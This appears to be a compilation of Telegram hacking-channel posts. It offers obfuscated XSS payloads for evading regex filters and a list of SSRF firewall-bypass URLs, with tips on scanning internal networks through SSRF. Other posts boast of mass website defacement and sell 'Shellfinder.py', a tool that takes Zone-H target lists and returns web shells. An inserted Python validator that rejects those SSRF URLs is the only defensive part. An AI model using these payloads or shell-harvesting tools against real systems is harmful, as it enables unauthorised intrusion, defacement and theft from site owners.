Scripts Shop
GITHUB
Frontend > UiKit
Backend > Php
#web #shop
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
-$ rmdir 2024/
-$ mkdir 2025/
WebSockets.pdf
230.3 KB
Complete article about WebSockets
Source: PortSwigger
Language: Persian
T.me/imexemi
XSS payload to bypass a regex filter by obfuscating the alert value:
<img src="X" onerror=top[8680439..toString(30)](1337)>
<script>top[8680439..toString(30)](1337)</script>
#bugbountyTips #xss
SSRF Payloads To Bypass Firewall
Here are 5 payloads that could be used for bypassing defenses when it comes to SSRF (Server-Side Request Forgery):
1) Bypass SSRF with CIDR:
http://127.127.127.127
http://127.0.0.0
2) Bypass using rare address:
http://127.1
http://0
3) Bypass using tricks combination:
http://1.1.1.1 &Q2.2.2.2# @3.3.3.3/ urllib : 3.3.3.3
4) Bypass against a weak parser:
http://127.1.1.1:80\@127.2.2.2:80/
5) Bypass localhost with [:]:
http://[::1:80/
http://0000::1:80/
Let's remind ourselves what SSRF vulnerabilities are and what we can do with them. In general, SSRF allows us to:
Access services on the loopback interface running on the remote server
Scan the internal network and potentially interact with the discovered services
Read local files on the server using the file:// protocol handler
Move laterally / pivot into the internal environment
How to find SSRF? When the target web application allows us to access external resources, e.g. a profile image loaded from an external URL (hosted on a 3rd-party website), we can try to load internal resources accessible by the vulnerable web application.
For example:
We discover that the following URL works:
https://example.com:8000/page?user=&link=https://127.0.0.1:8000
We can then run an Intruder attack (Burp Suite) trying different ports, effectively doing a port scan of the host. We can also try to scan private IPs such as 192.168.x.x and discover live IPs in the internal network.
#SSRF #Bypass #Waf #Firewall #Payload #exploit #Xploit
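Seen from the defending side, the URLs listed in the post all rely on the filter and the HTTP client disagreeing about which host a URL names. The following is an added example, not part of the original post: a Python check that refuses ambiguous authorities and canonicalises host literals before comparing them to address ranges. `check_url`, `literal_ip`, `system_resolver` and the sample inputs in `__main__` are names and values constructed for this illustration.

```python
import ipaddress
import re
import socket

# Strict grammar: scheme, bare host or bracketed IPv6, optional port, then a
# tail without whitespace, "\" or "@". Anything else is refused, not guessed at.
URL_RE = re.compile(
    r"https?://(\[[0-9A-Fa-f:.]+\]|[A-Za-z0-9.-]+)(?::\d{1,5})?(?:[/?#][^\s\\@]*)?"
)

def literal_ip(host):
    """Return the address a host literal denotes, or None for a DNS name."""
    if host.startswith("["):
        return ipaddress.IPv6Address(host[1:-1])  # ValueError if malformed
    try:
        # inet_aton follows the legacy IPv4 rules many HTTP stacks also apply:
        # "127.1" -> 127.0.0.1, "0" -> 0.0.0.0, hex and octal parts.
        return ipaddress.IPv4Address(socket.inet_aton(host))
    except OSError:
        return None

def system_resolver(host):
    """Default resolver (assumption: replace with the fetcher's own resolver)."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}

def check_url(url, resolve=system_resolver):
    """Return (allowed, reason, addresses the fetcher may connect to)."""
    m = URL_RE.fullmatch(url)
    if not m:
        return False, "ambiguous or malformed authority", []
    host = m.group(1)
    try:
        ip = literal_ip(host)
        ips = [ip] if ip is not None else [ipaddress.ip_address(a) for a in resolve(host)]
    except (ValueError, OSError):
        ips = []
    if not ips:
        return False, "host does not resolve", []
    for ip in ips:
        # Judge IPv4-mapped IPv6 (::ffff:a.b.c.d) by the embedded IPv4 address.
        target = getattr(ip, "ipv4_mapped", None) or ip
        if not target.is_global:
            return False, f"{host} -> {ip} is not a public address", []
    return True, "ok", [str(ip) for ip in ips]

if __name__ == "__main__":
    # URLs listed in the post, plus one well-formed loopback literal.
    for u in ["http://127.1", "http://0", "http://[::1:80/", "http://[::1]:80/",
              "http://127.1.1.1:80\\@127.2.2.2:80/", "http://1.1.1.1/"]:
        print(u, check_url(u))
```

The fetcher should connect to the returned addresses rather than resolving the name a second time, and apply the same check to every redirect target.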
How I hacked 100 hackers!
🔗link :
https://medium.com/@corneacristian/how-i-hacked-100-hackers-5c3c313e8a1a
#Hack #writeUp #medium
Massdef
More than 40 websites in 1 user
#hack #Webhacking
t.me/KurtLarCyberLab
@Bvrce
Shellfinder.py
You can see this tool's power in the video
The price is 460, discounted to 350 😉❤️
The tool is delivered to you exactly like this, clean and powerful: grab from Zone-H, feed it in, let it process them for you and give you shells, and enjoy
To get it, message:
@Bvrce
t.me/KurtLarCyberLab